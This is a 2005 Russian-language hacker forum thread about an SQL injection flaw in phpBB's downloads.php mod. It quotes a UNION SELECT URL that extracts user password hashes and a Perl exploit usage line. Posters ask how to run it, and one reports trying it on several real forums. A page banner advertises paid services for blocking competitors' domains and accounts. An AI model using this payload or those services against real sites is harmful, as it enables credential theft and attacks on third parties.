Форум АНТИЧАТ - Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php

Опции темы

Поиск в этой теме

Опции просмотра

Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php

05.04.2005, 22:47

~~SladerNon~~

Banned

Регистрация: 06.03.2005

Сообщений: 1,645

Провел на форуме:
7298807

Репутация: 901

Уязвимость в форуме phpBB <= 2.0.13 в модуле downloads.php

Бедный, всеми измученный форум, и опять дыра =)

Читаем тут:

http://www.securitylab.ru/53767.html

05.04.2005, 22:59

(-=util=-)

Постоянный

Регистрация: 02.12.2004

Сообщений: 352

Провел на форуме:
307649

Репутация: 67

Отправить сообщение для (-=util=-) с помощью ICQ

Угагагаааа))))) Ваще кранты =0)) Они же разорятся!

05.04.2005, 23:01

(-=util=-)

Постоянный

Регистрация: 02.12.2004

Сообщений: 352

Провел на форуме:
307649

Репутация: 67

Цитата:

downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=$user_id/*

а разве модуль downloads встроен во все форумы?

Пример

C:\>phpbb.pl www.site.com /phpBB2/ 2

В Выполнить это вообще писать? или как. если адрес форума www.site.com/phpBB2/index.php
И как понимать вообще знак ">"

Последний раз редактировалось (-=util=-); 05.04.2005 в 23:18..

05.04.2005, 23:35

Mefisto

Участник форума

Регистрация: 10.10.2004

Сообщений: 101

Провел на форуме:
6287

Репутация: 4

Отправить сообщение для Mefisto с помощью ICQ

а как этим пользоваться?)))

06.04.2005, 00:20

Sn_key

Участник форума

Регистрация: 07.03.2005

Сообщений: 160

Провел на форуме:
418635

Репутация: 30

Отправить сообщение для Sn_key с помощью ICQ

Блин!!! Несколько форумов перебрал все закрыты или
ужэ взломаны!!!Обьясните мож я чо не то делаю???

Цитата:

downloads.php?cat=-1%20UNION%20SELECT%200,user_password,0,0,0,0,0,0,0 %20FROM%20phpbb_users%20WHERE%20user_id=2/*

Вот сплойт вставляю я его в адрес но не х не получается:
ДОКУМЕНТ НЕ НАЙДЕН!!!!!!!!!!

06.04.2005, 06:05

(-=util=-)

Постоянный

Регистрация: 02.12.2004

Сообщений: 352

Провел на форуме:
307649

Репутация: 67

lol. Это однас тсрочка только из сплойта =) Внимательнее читай просто

06.04.2005, 09:27

madnet

Умиротворенн

Регистрация: 09.12.2004

Сообщений: 996

Провел на форуме:
2386719

Репутация: 1384

Отправить сообщение для madnet с помощью ICQ

Эта дыра только в МОДЕ downloads.php, а он почти нигде не используется.

__________________

http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)

http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА

06.04.2005, 09:37

hacsoft

Познающий

Регистрация: 14.03.2005

Сообщений: 43

Провел на форуме:
59867

Репутация: 2

Отправить сообщение для hacsoft с помощью ICQ

А где можно закачать этот мод? Дайте ссылочку.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Вопрос по заливке шелла, используя уязвимость highlight в форуме phpBB 2.0.6	vega2k	Форумы	12	11.01.2009 15:57
Новая XSS на форуме phpBB 2.0.19	NeMiNeM	Форумы	6	26.10.2006 21:30
Уязвимость в phpBB 2.0.17	PEPSICOLA	Форумы	13	28.09.2005 20:26
Как загрузить в папку форума, файл *.php, если я админ на форуме PhpBB 2.0.13?	dyx	Форумы	1	05.04.2005 11:29
Как узнать пароль на форуме phpBB <=2.0.10 ?	Evgeny	Форумы	6	26.11.2004 22:10

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход